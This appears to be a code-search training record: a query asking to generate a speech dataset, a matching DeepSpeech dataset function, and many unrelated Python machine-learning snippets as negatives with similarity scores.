name='FC4-elu')(FC_2)\n\n # version 3:\n conv1 = Convolution2D(32, (2, 2), strides=1, activation=\"relu\", name=\"conv1\")(input_data)\n flatten = Flatten(name=\"flatten\")(conv1)\n FC_2 = Dense(128, activation='relu', name='FC2-relu')(flatten)\n FC_3 = Dense(128, activation='relu', name='FC3-relu')(FC_2)\n context = Dense(128, activation='elu', name='FC4-elu')(FC_3)\n\n\n\n # else:\n # print('>>>> Defining Recurrent Modules...')\n # input_data_expanded = Reshape((input_shape[0], input_shape[1], input_shape[2], 1),\n # input_shape=input_shape)(input_data)\n # input_data_TimeDistributed = Permute((3, 1, 2, 4), input_shape=input_shape)(input_data_expanded)\n # h1 = TimeDistributed(Convolution2D(32, (8, 8), strides=4, activation=\"relu\", name=\"conv1\"), \\\n # input_shape=(args.num_frames, input_shape[0], input_shape[1], 1))(\n # input_data_TimeDistributed)\n # h2 = TimeDistributed(Convolution2D(64, (4, 4), strides=2, activation=\"relu\", name=\"conv2\"))(h1)\n # h3 = TimeDistributed(Convolution2D(64, (2, 2), strides=1, activation=\"relu\", name=\"conv3\"))(h2)\n # flatten_hidden = TimeDistributed(Flatten())(h3)\n # hidden_input = TimeDistributed(Dense(512, activation='relu', name='flat_to_512'))(flatten_hidden)\n # if not (args.a_t):\n # context = LSTM(512, return_sequences=False, stateful=False, input_shape=(args.num_frames, 512))(\n # hidden_input)\n # else:\n # if args.bidir:\n # hidden_input = Bidirectional(\n # LSTM(512, return_sequences=True, stateful=False, input_shape=(args.num_frames, 512)),\n # merge_mode='sum')(hidden_input)\n # all_outs = Bidirectional(\n # LSTM(512, return_sequences=True, stateful=False, input_shape=(args.num_frames, 512)),\n # merge_mode='sum')(hidden_input)\n # else:\n # all_outs = LSTM(512, return_sequences=True, stateful=False,\n # input_shape=(args.num_frames, 512))(hidden_input)\n # # attention\n # attention = TimeDistributed(Dense(1, activation='tanh'))(all_outs)\n # # print(attention.shape)\n # attention = Flatten()(attention)\n # attention = Activation('softmax')(attention)\n # attention = RepeatVector(512)(attention)\n # attention = Permute([2, 1])(attention)\n # sent_representation = merge([all_outs, attention], mode='mul')\n # context = Lambda(lambda xin: K.sum(xin, axis=-2), output_shape=(512,))(sent_representation)\n # # print(context.shape)\n\n if mode == \"dqn\":\n h4 = Dense(512, activation='elu', name=\"fc\")(context)\n output = Dense(num_actions, name=\"output\")(h4)\n # elif mode == \"duel\":\n # value_hidden = Dense(512, activation='relu', name='value_fc')(context)\n # value = Dense(1, name=\"value\")(value_hidden)\n # action_hidden = Dense(512, activation='relu', name='action_fc')(context)\n # action = Dense(num_actions, name=\"action\")(action_hidden)\n # action_mean = Lambda(lambda x: tf.reduce_mean(x, axis=1, keep_dims=True), name='action_mean')(\n # action)\n # output = Lambda(lambda x: x[0] + x[1] - x[2], name='output')([action, value, action_mean])\n model = Model(inputs=input_data, outputs=output)\n print(model.summary())\n return model", "def __init__(self, model: Model1D):\n self._model = model", "def initialize_module():\n global ngram_model\n ngram_model = load_model()" ]
[ "0.71115047", "0.60863584", "0.60634947", "0.6042872", "0.5957492", "0.589929", "0.5818367", "0.5788677", "0.5773995", "0.57248014", "0.57248014", "0.57248014", "0.57248014", "0.57248014", "0.57153296", "0.56870234", "0.5674797", "0.56720144", "0.5628486", "0.5593021", "0.5587657", "0.5580817", "0.5558203", "0.5535412", "0.5525206", "0.5516045", "0.5506121", "0.5460767", "0.54452455", "0.54422617", "0.54295236", "0.54209596", "0.5410969", "0.54049355", "0.5396264", "0.539459", "0.53930545", "0.53927827", "0.5392418", "0.5390946", "0.53904545", "0.53845423", "0.537284", "0.53671527", "0.536323", "0.53617424", "0.53508276", "0.5350179", "0.5345642", "0.53454566", "0.5344366", "0.5341592", "0.5318017", "0.5311294", "0.5308564", "0.5308564", "0.52997327", "0.5297424", "0.52960545", "0.5294392", "0.52641726", "0.5263245", "0.52616197", "0.52594227", "0.52517176", "0.5245395", "0.5245294", "0.5230041", "0.52047294", "0.52020514", "0.52020514", "0.5199654", "0.51952046", "0.519095", "0.51906884", "0.518922", "0.5187611", "0.51670766", "0.5164155", "0.5163744", "0.51562077", "0.51481414", "0.514741", "0.5144526", "0.51437473", "0.51437473", "0.5140816", "0.51354206", "0.5134463", "0.5118196", "0.51153934", "0.5110684", "0.5105568", "0.51007915", "0.5100038", "0.50994134", "0.50988096", "0.5096564", "0.5092942", "0.50899667" ]
0.5734031
9
Generate a speech dataset.
def generate_dataset(data_dir: str, partition: str) -> dataset.DeepSpeechDataset: global FLAGS audio_conf = dataset.AudioConfig( sample_rate=FLAGS.sample_rate, window_ms=FLAGS.window_ms, stride_ms=FLAGS.stride_ms, normalize=True) data_conf = dataset.DatasetConfig( audio_config=audio_conf, data_path=data_dir, vocab_file_path=FLAGS.vocab_file, sortagrad=FLAGS.sortagrad) speech_dataset = dataset.DeepSpeechDataset(dataset_config=data_conf, partition=partition, seed=FLAGS.seed) return speech_dataset
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def generateDataset(self):\n if self.outdir[-1] != \"/\": \n self.outdir += \"/\"\n self.outdir += \"dataset_trackml\"\n i = 1\n while os.path.exists(self.outdir):\n self.outdir.replace(\"_\"+str(i-1), \"\")\n self.outdir += (\"_\"+str(i))\n i += 1\n cmd = \"mkdir -p \"+ self.outdir\n os.system(cmd)\n\n cont = pc.particleController()\n cont.generateEvents(self.numevents, self.hpe, self.detectors)\n\n self.generateHits(cont)\n self.generateTruths(cont)\n self.generateSolution(cont)", "def generate_synth_data(n):", "def generate_dataset(self):\n\t\timg_set = []\n\t\tqa_set = []\n\t\tfor i in range(self.config.dataset_size):\n\t\t\timg, r = self.generate_image()\n\t\t\tq = self.generate_question()\n\t\t\ta = self.generate_answer(r, q)\n\t\t\timg_sample = {\n\t\t\t\t'id': i,\n\t\t\t\t'image': img.tolist()\n\t\t\t}\n\t\t\timg_set.append(img_sample)\n\t\t\tfor j in range(len(q)):\n\t\t\t\tqa_sample = {\n\t\t\t\t\t'id': i,\n\t\t\t\t\t'question': q[j].tolist(),\n\t\t\t\t\t'answer': a[j].tolist()\n\t\t\t\t}\n\t\t\t\tqa_set.append(qa_sample)\n\t\tprint('Finished creating smaples')\n\t\tdataset = {\n\t\t\t'image':\timg_set,\n\t\t\t'qa':\tqa_set\n\t\t}\n\t\twith open(self.path, 'w') as f:\n\t\t\tjson.dump(dataset, f)", "def generate_audio():\n text, lang = introduction()\n ses = boto3.Session(profile_name=\"default\")\n pol = ses.client(\"polly\")\n res = pol.synthesize_speech(Text=text, LanguageCode=lang, OutputFormat=\"mp3\", VoiceId=VOICE)\n return res", "def make_train_dataset(dataset_dir, speakers=None):\n training_dir = os.path.join(dataset_dir, 'vcc2018_training')\n evaluation_dir = os.path.join(dataset_dir, 'vcc2018_evaluation')\n if speakers is None:\n speakers = [speaker for speaker in os.listdir(training_dir)\n if speaker.startswith('VCC2') and\n os.path.isdir(os.path.join(training_dir, speaker))]\n\n resample = Resample(22050, 16000)\n create_spectrogram = Spectrogram(n_fft=N_FFT, hop_length=HOP_LEN)\n\n dataset = []\n with torch.no_grad():\n for c, speaker in enumerate(speakers):\n speaker_dir = os.path.join(training_dir, speaker)\n wav_files = [os.path.join(speaker_dir, wav_file)\n for wav_file in os.listdir(speaker_dir)\n if os.path.splitext(wav_file)[1] == '.wav']\n speaker_dir = os.path.join(evaluation_dir, speaker)\n wav_files.extend([os.path.join(speaker_dir, wav_file)\n for wav_file in os.listdir(speaker_dir)\n if os.path.splitext(wav_file)[1] == '.wav'])\n spectrogram = []\n for wav_file in wav_files:\n sound, _ = torchaudio.load(wav_file)\n sound = resample(sound)\n spectrogram.append(create_spectrogram(sound).squeeze(0))\n spectrogram = torch.cat(spectrogram, dim=1)\n\n hop_length = DATA_LEN // 4\n for n in range((spectrogram.size(1) - DATA_LEN) // hop_length + 1):\n start = n * hop_length\n data = spectrogram[:, start:start + DATA_LEN]\n label = torch.zeros(len(speakers))\n label[c] = 1\n dataset.append((data, label))\n\n return dataset", "def create_samples(self):\n for s_id in range(len(self.data[\"sample\"])):\n self.samples.add(Sample(s_id, [self.data[key][s_id] for key in self.data.keys() if key not in WRONG_KEYS],\n self.data[\"label\"][s_id]))", "def generate_samples(self, nsamples):\n assert self.trained, \"Model must first be fitted to some data.\"\n logger.debug(f'Generate synthetic dataset of size {nsamples}')\n synthetic_data, _ = self.gm.sample(nsamples)\n return synthetic_data", "def generate_synthetic_dataset(args):\n logger = logging.getLogger(\"GACM\")\n logger.info('Checking the data files...')\n for data_path in args.train_dirs + args.dev_dirs + args.test_dirs:\n assert os.path.exists(data_path), '{} file does not exist.'.format(data_path)\n assert len(args.test_dirs) > 0, 'No test files are provided.'\n dataset = Dataset(args, train_dirs=args.train_dirs, dev_dirs=args.dev_dirs, test_dirs=args.test_dirs)\n logger.info('Initialize the model...')\n model = Agent(args, len(dataset.qid_query), len(dataset.uid_url), len(dataset.vid_vtype))\n logger.info('model.global_step: {}'.format(model.global_step))\n assert args.load_model > -1\n logger.info('Restoring the model...')\n model.load_model(model_dir=args.load_dir, model_prefix=args.algo, global_step=args.load_model, load_optimizer=False)\n\n synthetic_types = ['deterministic', 'stochastic']\n shuffle_splits = [None, [1, 11], [1, 6, 11]]\n amplifications = [1, 7]\n for synthetic_type in synthetic_types:\n for shuffle_split in shuffle_splits:\n for amplification in amplifications:\n #synthetic_type = 'deterministic'\n #shuffle_split = None\n #amplification = 1\n file_path = os.path.join(args.load_dir, '..', 'synthetic')\n model.generate_synthetic_dataset('test', dataset, file_path, \n 'synthetic_{}_{}_{}.txt'.format(synthetic_type[0].upper(), str(shuffle_split), amplification), \n synthetic_type=synthetic_type, shuffle_split=shuffle_split, amplification=amplification)\n # exit()\n logger.info('Done with click sequence generation.')", "def generate(size, data_dim=5, n_phrase_labels=4, n_words=3,\n n_phrase_words=3, n_phrases=5, label_noise=0.,\n min_sent_len=5, max_sent_len=5, tag_end=True):\n assert n_words < 256\n assert max_sent_len >= n_phrase_words\n global dictionary, phrases\n\n # generate dictionary\n dictionary = uniform(-1.0, 1.0, size=(n_words, data_dim))\n\n # generate n_phrases unique word sequences of length n_phrase_words\n print \"Generating %d phrases\" % n_phrases\n phrases = []\n phrase_labels = []\n while len(phrases) != n_phrases:\n phrases = np.unique(np.array([\"\".join(map(chr, randint(n_words, size=n_phrase_words)))\n for i in xrange(n_phrases)], dtype=np.object))\n assert np.unique(map(len, phrases)) == n_phrase_words\n phrase_labels = 1+randint(n_phrase_labels-1, size=n_phrases)\n\n # generate 'sentences'\n print \"Generating %d sentences\" % sum(size)\n Xind = []\n Y = []\n for i in xrange(sum(size)):\n while True:\n sent_len = randint(min_sent_len, max_sent_len+1)\n sent = \"\".join(map(chr, randint(n_words, size=sent_len)))\n if contains_any_phrase(sent, phrases):\n print \".\",\n break\n Y.append(np.zeros(sent_len,dtype=np.int))\n Xind.append(sent)\n\n # generate labels for dataset\n print \"Generating labels for the sentences...\"\n for phrase, plabel in zip(phrases, phrase_labels):\n for idx, sent in enumerate(Xind):\n start = 0\n while True:\n sidx = sent.find(phrase, start)\n if sidx < 0:\n break\n if tag_end:\n Y[idx][sidx+len(phrase)-1] = plabel\n else:\n Y[idx][sidx] = plabel\n start += 1\n\n print \"Trafo...\"\n # transform dataset to code\n if data_dim > 1:\n X = [[dictionary[ord(c)] for c in sent] for sent in Xind]\n else:\n X = [[ord(c) for c in sent] for sent in Xind]\n\n Xtrain, Xtest = X[:size[0]], X[size[0]:]\n Ytrain, Ytest = Y[:size[0]], Y[size[0]:]\n\n # training label noise\n for sent in Ytrain:\n mask = uniform(size=sent.size) < label_noise\n sent[mask] = randint(n_phrase_labels, size=mask.sum())\n print \"Done.\"\n\n return Xtrain, Xtest, Ytrain, Ytest", "def generate_dataset(num_sequences=2**8):\n samples = []\n \n for _ in range(num_sequences): \n num_tokens = np.random.randint(1, 12)\n sample = ['a'] * num_tokens + ['b'] * num_tokens + ['EOS']\n samples.append(sample)\n \n return samples", "def load_synthesizer_dataset(sentences):\n return TFRecordDataset([path.join(TFRSDIR, sentence+'.tfr')\n for sentence in sentences])\\\n .map(\n lambda record: \\\n tf.parse_single_example(\n record,\n features={\n 's': tf.FixedLenFeature([], tf.string),\n 'l': tf.FixedLenFeature([NL+9], tf.float32),\n 'a': tf.FixedLenFeature([NA], tf.float32)\n }\n )\n )\\\n .map(\n lambda feature: (feature['l'], feature['s'], feature['a'])\n )", "def create_dataset(n_examples):\n \n human_vocab = set()\n machine_vocab = set()\n dataset = []\n\n for i in tqdm(range(n_examples)):\n h, m, _ = create_date()\n if h is not None:\n dataset.append((h, m))\n human_vocab.update(tuple(h))\n machine_vocab.update(tuple(m))\n\n human = dict(zip(list(human_vocab) + ['<unk>', '<pad>'], \n list(range(len(human_vocab) + 2))))\n inv_machine = dict(enumerate(list(machine_vocab) + ['<unk>', '<pad>']))\n machine = {v:k for k,v in inv_machine.items()}\n \n return dataset, human, machine, inv_machine", "def create_samples(self):\n self._samples = self.load_samples()\n self.modify_samples()", "def peoples_speech(\n corpus_dir: Pathlike,\n output_dir: Pathlike,\n):\n prepare_peoples_speech(\n corpus_dir,\n output_dir=output_dir,\n )", "def create_data_response(speech: str) -> str:\n\n data = {\n \"speech\": speech,\n \"displayText\": speech,\n \"source\": \"pirka-chatbot-webserver\"\n }\n return data", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def samples(self):\n pass", "def inference(self):\n embeddings = self.process_speaker(speaker_speech_path=self.main_configs.SPEAKER_SPEECH_PATH)\n with open(self.main_configs.INPUT_TEXTS_PATH, \"r\") as file:\n texts = file.readlines()\n specs = self.synthesize_spectrograms(texts=texts, embeddings=embeddings)\n specs = specs[0]\n wav = self.generate_waveform(specs)\n return wav", "def get_speech(self, phrase):\n src = os.path.join(constants.CONFIG_PATH, self.voice)\n text = phrase\n\n def preprocess(syllables):\n temp = []\n for syllable in syllables:\n for p in self.punctuation:\n syllable = syllable.replace(p, \"\")\n if syllable.isdigit():\n syllable = atc.num2chinese(syllable)\n new_sounds = lazy_pinyin(syllable, style=pypinyin.TONE3)\n for e in new_sounds:\n temp.append(e)\n else:\n temp.append(syllable)\n return temp\n \n if not os.path.exists(src):\n logger.error('{} 合成失败: 请先下载 syllables.zip (https://sourceforge.net/projects/hantts/files/?source=navbar) 并解压到 ~/.wukong 目录下'.format(self.SLUG))\n return None\n logger.debug(\"{} 合成中...\".format(self.SLUG))\n delay = 0\n increment = 355 # milliseconds\n pause = 500 # pause for punctuation\n syllables = lazy_pinyin(text, style=pypinyin.TONE3)\n syllables = preprocess(syllables)\n \n # initialize to be complete silence, each character takes up ~500ms\n result = AudioSegment.silent(duration=500*len(text))\n for syllable in syllables:\n path = os.path.join(src, syllable+\".wav\")\n sound_file = Path(path)\n # insert 500 ms silence for punctuation marks\n if syllable in self.punctuation:\n short_silence = AudioSegment.silent(duration=pause)\n result = result.overlay(short_silence, position=delay)\n delay += increment\n continue\n # skip sound file that doesn't exist\n if not sound_file.is_file():\n continue\n segment = AudioSegment.from_wav(path)\n result = result.overlay(segment, position=delay)\n delay += increment\n\n tmpfile = ''\n with tempfile.NamedTemporaryFile() as f:\n tmpfile = f.name\n result.export(tmpfile, format=\"wav\")\n logger.info('{} 语音合成成功,合成路径:{}'.format(self.SLUG, tmpfile))\n return tmpfile", "def generate_syntetic_data( self ):\n label_list = []\n img_ground_truth = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n img = np.zeros( ( self.img_h, self.img_w, 3 ), dtype = np.float32 )\n class_blue = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n class_red = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n\n '''line, square, grill, rectangle, cross'''\n if self.option_shape == 'line':\n sample_type = 0\n elif self.option_shape == 'circle':\n sample_type = 1\n elif self.option_shape == 'rectangle':\n sample_type = 2\n else: \n sample_type = np.random.randint( 3 ) #0,1,2\n\n if sample_type == 0:\n self.generate_line( img_ground_truth, img, class_blue, class_red )\n elif sample_type == 1:\n self.generate_circle( img_ground_truth, img, class_blue, class_red )\n else:\n self.generate_rectangle( img_ground_truth, img, class_blue, class_red )\n\n label_list.append( class_blue )\n label_list.append( class_red )\n # 2 classes generates\n label_all = np.dstack( label_list ).astype( np.float32 ) \n r, g, b = cv2.split( img )\n img_bgr = cv2.merge( [ b, g, r ] )\n\n gen_adj = GenerateAdjMatrx( type_dist = self.type_dist )\n A_gt = gen_adj.adjmatrx_groundthuth( img_ground_truth )\n\n B_in = gen_adj.adjmatrx_groundthuth(img_ground_truth * 0)\n\n return img_bgr, img_ground_truth, label_all, A_gt, B_in", "def generate_corpus():\n data = load_data()\n questions = [s.split(' ', 1)[1].lower() for s in data]\n return questions", "def test_get_voice_datasets(self):\n pass", "def gen_datafiles():\n\tnum_reads = 10000\n\tnum_samples = 100\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_train.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_train.txt')\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_test.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_test.txt')", "def create_dataset(dataset_type, soruce, opts): \n\n p = PreProcessor(dataset_type, opts)\n\n # If we are NOT running \"implementation.py\", we read the data from file\n if dataset_type == \"train\" or dataset_type == \"dev\" or dataset_type == \"test\":\n path_to_data = soruce\n p.read_labelled_data(path_to_data) \n # Otherwise, we read the sentence that \"implementation.py\" gave us\n elif dataset_type == \"submit\":\n submission_sentence = soruce\n p.read_test_data(submission_sentence)\n\n # Encode all the data to a list of torchTensors\n encoded_tokens, encoded_pred, encoded_tokens_pos, encoded_labels = p.encode_all_data()\n # Create SRL dataset\n dataset = SRLDataset(x=encoded_tokens, pr=encoded_pred, p=encoded_tokens_pos, y=encoded_labels)\n print(\"{} dataset size is {}\".format(dataset_type, len(dataset)))\n\n if dataset_type == \"train\" or dataset_type == \"dev\" or dataset_type == \"test\":\n return dataset\n elif dataset_type == \"submit\":\n return dataset, p.list_l_original_predicates", "def run_deep_speech():\n global FLAGS\n tf.set_random_seed(FLAGS.seed)\n # Data precessing\n tf.logging.info(\"Data Processing...\")\n train_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"train\")\n eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"dev\")\n\n # Number of label classes. Label string is \"[a-z]' -\"\n num_classes = len(train_speech_dataset.speech_labels)\n\n # not available in 1.4\n distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus)\n run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config())\n\n estimator = es.Estimator(\n model_fn=model_fn, model_dir=FLAGS.model_dir, config=run_config, params={\"num_classes\": num_classes})\n\n run_params = {\n \"batch_size\": FLAGS.batch_size,\n \"train_epochs\": FLAGS.train_epochs,\n \"rnn_hidden_size\": FLAGS.rnn_hidden_size,\n \"rnn_hidden_layers\": FLAGS.rnn_hidden_layers,\n \"rnn_type\": FLAGS.rnn_type,\n \"is_bidirectional\": FLAGS.is_bidirectional,\n \"use_bias\": FLAGS.use_bias\n }\n\n benchmark_logger = logger.get_benchmark_logger()\n benchmark_logger.log_run_info(\n model_name=\"deep_speech\", dataset_name=\"LibriSpeech\", run_params=run_params, test_id=FLAGS.benchmark_test_id)\n\n train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size)\n per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus)\n\n def input_fn_train():\n return train_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n def input_fn_eval():\n return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals\n total_training_cycle = FLAGS.train_epochs\n\n for cycle_index in range(total_training_cycle):\n tf.logging.info(f\"Starting train cycle: {cycle_index + 1} / {total_training_cycle}\")\n\n # Perform batch_wise dataset shuffling\n train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size)\n\n # Train\n estimator.train(input_fn=input_fn_train, hooks=train_hooks)\n\n # Evaluation\n tf.logging.info(\"Starting to evaluate...\")\n eval_results = evaluate_model(estimator, speech_labels=eval_speech_dataset.speech_labels,\n entries=eval_speech_dataset.entries, input_fn_eval=input_fn_eval)\n\n # Log the WER and CER results.\n benchmark_logger.log_evaluation_result(eval_results)\n tf.logging.info(\n f\"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}\")", "def gen_data(self):\n\n # 1,read the source text\n inputs, labels = self.read_data()\n print(\"read finished\")\n\n # 2. word label index\n word_to_index, label_to_index = self.gen_word_label_index()\n # print(\"word_to_index\",word_to_index)\n # print(\"label_to_index\",label_to_index)\n print(\"vocab process finished\")\n #\n # 3,input to index\n inputs_idx = self.trans_to_index(inputs, word_to_index)\n # print((inputs_idx))\n print(\"index transform finished\")\n #\n # 4, padding\n inputs_idx = self.padding(inputs_idx, self._sequence_length)\n # print(inputs_idx)\n print(\"padding finished\")\n\n # 6,label to index\n labels_idx = self.trans_label_to_index(labels, label_to_index)\n print(\"label index transform finished\")\n\n return np.array(inputs_idx), np.array(labels_idx)", "def as_dataset(self) -> \"Dataset\":\n \n freq_def = {\n 1: \"L1\", # G\n 2: \"L2\", # G\n 5: \"L5\", # G\n 20: \"L2C\", # G\n 101: \"L1\", # R\n 102: \"L2\", # R\n 201: \"E1\", # E \n 205: \"E5a\", # E\n 206: \"E6\", # E\n 207: \"E5b\", # E\n 208: \"E5\", # E\n 302: \"B1_2\", # C\n 306: \"B3\", # C\n 307: \"B2b\", # C\n }\n\n float_fields = {\n \"amplitude\": None,\n \"azimuth\": \"radian\",\n \"peak2noise\": None, \n \"reflection_height\": \"meter\", \n }\n\n # Initialize dataset\n dset = dataset.Dataset()\n if not self.data:\n log.warn(\"No data in {self.file_path}.\")\n return dset\n dset.num_obs = len(self.data[\"time\"])\n\n # Add text fields\n satellite = list()\n system = list()\n for sat in self.data[\"satellite\"]:\n if sat >= 1 and sat < 100: # GPS satellites\n system.append(\"G\")\n satellite.append(\"G\" + str(int(sat)).zfill(2))\n elif sat >= 101 and sat < 200: # GLONASS satellites\n system.append(\"R\")\n satellite.append(\"R\" + str(int(sat))[1:3])\n elif sat >= 201 and sat < 300: # Galileo satellites\n system.append(\"E\")\n satellite.append(\"E\" + str(int(sat))[1:3])\n elif sat >= 301 and sat < 400: # BeiDou satellites\n system.append(\"C\")\n satellite.append(\"C\" + str(int(sat))[1:3])\n else:\n log.fatal(\"GNSSREFL satellite number {sat} is not defined. Valid satellite numbers are between [1-399].\")\n\n dset.add_text(\n name=\"system\", \n val=system, \n write_level=\"operational\",\n )\n\n dset.add_text(\n name=\"satellite\", \n val=satellite, \n write_level=\"operational\",\n )\n\n dset.add_text(\n name=\"frequency\", \n val=[freq_def[v] for v in self.data[\"frequency\"]], \n write_level=\"operational\",\n ) \n \n # Add time field\n dset.add_time(\n name=\"time\", \n val=self.data[\"time\"], \n scale=\"utc\", \n fmt=\"datetime\", \n write_level=\"operational\",\n )\n \n # Add float fields\n for field in float_fields.keys():\n if field not in self.data.keys():\n log.warn(f\"Field '{field}' does not exist in file {self.meta['__data_path__']}.\")\n continue\n \n value = np.deg2rad(self.data[field]) if field == \"azimuth\" else self.data[field]\n unit = \"\" if float_fields[field] is None else float_fields[field]\n \n dset.add_float(name=field, val=value, unit=unit, write_level=\"operational\")\n \n return dset", "def _init_dataset(self):\n chars = set()\n with open(self.file_path + \"/words.txt\", 'r') as input_file:\n for line in input_file:\n line_split = line.strip().split('\\t')\n file_name = self.file_path+\"/words/\"+line_split[1]\n gt_text = line_split[0]\n chars = chars.union(set(list(gt_text)))\n self.samples.append((file_name, gt_text))\n input_file.close()\n\n self.char_set = sorted(list(chars))", "def generate_sentence_embeddings():\n generate_embeddings_sentence(\"Data/en-train.json\", \"Data_Sent_Embds/en_sent.pkl\")\n generate_embeddings_sentence(\"Data/es-train.json\", \"Data_Sent_Embds/es_sent.pkl\")\n generate_embeddings_sentence(\"Data/pr-train.json\", \"Data_Sent_Embds/pr_sent.pkl\")", "def speech_to_text(\n audio_ms: Tuple[int, int],\n label_symbols: Sequence[str],\n label_len: Tuple[int, int],\n audio_channels: int = 1,\n audio_dtype: torch.dtype = torch.int16,\n audio_device: torch.device = torch.device(\"cpu\"),\n audio_pin_memory: bool = False,\n audio_sample_rate: int = 16000,\n audio_transform: Optional[Callable[[torch.Tensor], torch.Tensor]] = None,\n label_transform: Optional[Callable[[str], str]] = None,\n) -> SpeechToTextGen:\n if audio_ms[0] > audio_ms[1]:\n raise ValueError(\"audio_ms lower bound must be > upper bound\")\n\n if audio_ms[0] <= 0:\n raise ValueError(\"audio_ms must be greater than 0\")\n\n if label_len[0] > label_len[1]:\n raise ValueError(\"label_len lower bound must be > upper bound\")\n\n if label_len[0] < 0:\n raise ValueError(\"label_len must be greater than or equal to 0\")\n\n if audio_channels < 1:\n raise ValueError(\"audio_channels must be >= 1\")\n\n dtypes = [torch.float64, torch.float32, torch.int32, torch.int16]\n if audio_dtype not in dtypes:\n raise ValueError(f\"audio_dtype must be in {dtypes}\")\n\n rnd = random.Random()\n\n def generator(key: int) -> Tuple[torch.Tensor, str]:\n rnd.seed(a=key)\n\n if label_symbols:\n label = \"\".join(\n rnd.choices(label_symbols, k=rnd.randint(*label_len))\n )\n else:\n label = \"\"\n\n audio_samples = math.ceil(\n rnd.randint(*audio_ms) * (audio_sample_rate / 1000)\n )\n if audio_channels > 1:\n audio_size: Union[Tuple[int], Tuple[int, int]] = (\n audio_channels,\n audio_samples,\n )\n else:\n audio_size = (audio_samples,)\n\n audio = torch.empty(\n audio_size,\n dtype=audio_dtype,\n device=audio_device,\n pin_memory=audio_pin_memory,\n )\n\n if audio_dtype.is_floating_point:\n audio.normal_(mean=0, std=1)\n elif audio_dtype == torch.int16:\n audio.random_(\n -(2 ** 15), 2 ** 15\n ) # random_ subtracts 1 from upper\n else:\n audio.random_(\n -(2 ** 31), 2 ** 31\n ) # random_ subtracts 1 from upper\n\n if audio_transform is not None:\n audio = audio_transform(audio)\n\n if label_transform is not None:\n label = label_transform(label)\n\n return audio, label\n\n return generator", "def samples(self, gp):\r\n raise NotImplementedError", "def create_lm_dataset(opt, logger=None):\n # Using spacy to tokenize text\n spacy_en = spacy.load('en')\n # Add <unk> special case is due to wiki text which has raw <unk>\n spacy_en.tokenizer.add_special_case(\"<unk>\", [{ORTH: \"<unk>\"}])\n\n def tokenize(text):\n \"\"\"tokenize sentence\"\"\"\n return [item.text for item in spacy_en.tokenizer(text)]\n\n is_lower = True\n if opt.data_type == \"ptb\":\n is_lower = False\n TEXT = torchtext.data.Field(\n sequential=True,\n tokenize=tokenize,\n lower=is_lower\n )\n\n resources_dir = os.path.expanduser(opt.resources_dir)\n if opt.data_type == \"wiki3\":\n train, valid, test = torchtext.datasets.WikiText103.splits(\n text_field=TEXT,\n root=resources_dir\n )\n if opt.data_type == \"wiki2\":\n train, valid, test = torchtext.datasets.WikiText2.splits(\n text_field=TEXT,\n root=resources_dir\n )\n if opt.data_type == \"ptb\":\n train, valid, test = torchtext.datasets.PennTreebank.splits(\n text_field=TEXT,\n root=resources_dir\n )\n\n if logger:\n logger.info(f\"train token: {len(train.examples[0].text)}\")\n logger.info(f\"test token: {len(test.examples[0].text)}\")\n logger.info(f\"valid token: {len(valid.examples[0].text)}\")\n\n device = torch.device(opt.device)\n if opt.input_vector is not None:\n opt.input_vector = os.path.expanduser(opt.input_vector)\n head, tail = os.path.split(opt.input_vector)\n torchtext_vectors = torchtext.vocab.Vectors(name=tail, cache=head)\n torchtext_vectors.vectors.to(device)\n # print(f\"len: {len(torchtext_vectors.stoi)}\")\n # print(f\"size: {torchtext_vectors.vectors.size()}\")\n # Here the list of list is to simulate the real dataset\n # where first dim is sentence and second is word.\n limited_train = [[word] for word in torchtext_vectors.stoi.keys()]\n TEXT.build_vocab(limited_train, vectors=torchtext_vectors)\n else:\n TEXT.build_vocab(train)\n\n train_iter, val_iter, test_iter = torchtext.data.BPTTIterator.splits(\n (train, valid, test),\n batch_size=opt.batch_size,\n bptt_len=opt.bptt_len,\n device=device,\n repeat=False\n )\n return (TEXT, train_iter, test_iter, val_iter)", "def _generate_samples(samples_data_table=None):\n samples_data_table = samples_data_table or dict()\n\n con_name = f\"Auto_Sample_Test_{datetime.now()}\"\n con_result_soup = BeautifulSoup(_post_con(con_name), \"xml\")\n con_uri = con_result_soup.find(\"con:container\")[\"uri\"]\n\n sample_list = list()\n for i in range(1, 97, 2):\n well = (\n 'ABCDEFGH'[(i - 1) % 8] + ':' + '%01d' % ((i - 1) // 8 + 1,))\n letter = 'ABCDEFGH'[i % 8]\n to_add = api_types.Sample(f\"test{i}{letter}\")\n to_add.location = well\n to_add.con = api_types.Container(\n con_name,\n \"96 well plate\",\n \"\",\n con_uri)\n\n for data_name, data_value in samples_data_table.items():\n if \"udf\" in data_name:\n udf_name = data_name.strip(\"udf_\")\n to_add.udf_to_value[udf_name] = data_value\n elif \"adapter\" in data_name:\n to_add.adapter = data_value\n sample_list.append(to_add)\n return sample_list", "def nao_speech(possible_sentences):\n\n print(random.choice(possible_sentences))", "def generate_samples(self, data_dir, tmp_dir, dataset_split):\n train = dataset_split == problem.DatasetSplit.TRAIN\n dataset_path = (\"train.tok.clean.bpe.32000\"\n if train else \"newstest2013.tok.bpe.32000\")\n train_path = _get_wmt_ende_bpe_dataset(tmp_dir, dataset_path)\n\n # 